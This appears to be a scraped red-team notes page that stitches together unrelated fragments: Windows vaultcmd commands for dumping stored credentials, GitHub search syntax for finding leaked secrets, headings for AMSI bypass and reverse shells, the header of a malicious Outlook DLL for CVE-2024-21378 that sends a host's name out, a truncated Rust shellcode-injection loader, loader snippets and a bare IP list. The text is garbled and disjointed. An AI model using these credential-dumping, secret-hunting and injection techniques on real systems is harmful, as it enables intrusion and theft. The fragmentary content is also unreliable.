Computer button pusher // Autodidact since my childhood || SIN - SIN HACK - HACK || NO-CODE evangelist || Skiddie learning REDTEAMING - Black coffee like my sense of humor Saltinbank-SyS

Credential vault

Works only when running as same user whose credentials we are dumping

List vaults

C:\Users\Alex\Desktop> vaultcmd /list

List available credentials in vault

C:\Users\Alex\Desktop> vaultcmd /listcreds:"<vault-name>" /all

GitHub Search Syntax for Finding API Keys/Secrets/Tokens

As a security professional, it is important to conduct a thorough reconnaissance. With the increasing use of APIs nowadays, it has become paramount to keep access tokens and other API-related secrets secure in order to prevent leaks. However, despite technological advances, human error remains a factor, and many developers still unknowingly hardcode their API secrets into source code and commit them to public repositories. GitHub, being a widely popular platform for public code repositories, may inadvertently host such leaked secrets. To help identify these vulnerabilities, I have created a comprehensive search list using powerful search syntax that enables the search of thousands of leaked keys and secrets in a single search.

Search Syntax:

(path:*.{File_extension1} OR path:*.{File_extension-N}) AND ({Keyname1} OR {Keyname-N}) AND (({Signature/pattern1} OR {Signature/pattern-N}) AND ({PlatformTag1} OR {PlatformTag-N}))

Examples:

**1.

Red Teaming tool

General usefull Powershell Scripts
AMSI Bypass restriction Bypass
Payload Hosting
Network Share Scanner
Lateral Movement
Reverse Shellz
POST Exploitation

	/**
	* This DLL is designed for use in conjunction with the Ruler tool for
	* security testing related to the CVE-2024-21378 vulnerability,
	* specifically targeting MS Outlook.
	*
	* It can be used with the following command line syntax:
	* ruler [auth-params] form add-com [attack-params] --dll ./test.dll
	* Ruler repository: https://github.com/NetSPI/ruler/tree/com-forms (com-forms branch).
	*
	* After being loaded into MS Outlook, it sends the PC's hostname and

	requirements:
	OWASP top 10
	kali linux
	Active Directory concepts
	Windows Internals
	Linux Internals

	Red Team 1 ->35-45 hours
	Network Fundamentals
	Web Application Security

	/*
	* Rust basic Process injection using OpenProcess, VirtualAllocEx, WriteProcessMemory and CreateRemoteThread
	* API dynamic resolution and shellcode XOR encoded
	*/
	#[allow(non_camel_case_types)]
	type HANDLE = *mut u64;
	#[allow(non_camel_case_types)]
	type LPVOID = *mut u64;
	#[allow(non_camel_case_types)]
	type DWORD = u32;

	using System;
	using System.Collections;
	using System.Collections.Generic;
	using System.Linq;
	using System.Linq.Expressions;
	using System.Reflection;
	using System.Text;

	GetMethodHash("System.Reflection.Assembly", "Load");

	# Simple script to check drivers in C:\windows\system32\drivers against the loldrivers list
	# Author: Oddvar Moe - @oddvar.moe

	$drivers = get-childitem -Path c:\windows\system32\drivers
	$web_client = new-object system.net.webclient
	$jsonString = $web_client.DownloadString("https://www.loldrivers.io/api/drivers.json")
	$jsonString = $jsonString -replace '"INIT"','"init"'
	$loldrivers = $jsonString \| ConvertFrom-Json

	Write-output("Checking {0} drivers in C:\windows\system32\drivers against loldrivers.io json file" -f $drivers.Count)

	import argparse
	import typing
	import math
	from uuid import UUID
	from pyasn1.codec.der import decoder
	from pyasn1_modules import rfc5652
	from struct import unpack
	from cryptography import utils
	from cryptography.exceptions import AlreadyFinalized, InvalidKey
	from cryptography.hazmat.primitives.kdf import KeyDerivationFunction

	2.133.130.23
	27.11.235.246
	42.192.132.19
	43.240.48.46
	43.244.89.152
	45.32.106.94
	49.12.46.139
	59.26.93.6
	80.168.201.195
	81.19.141.35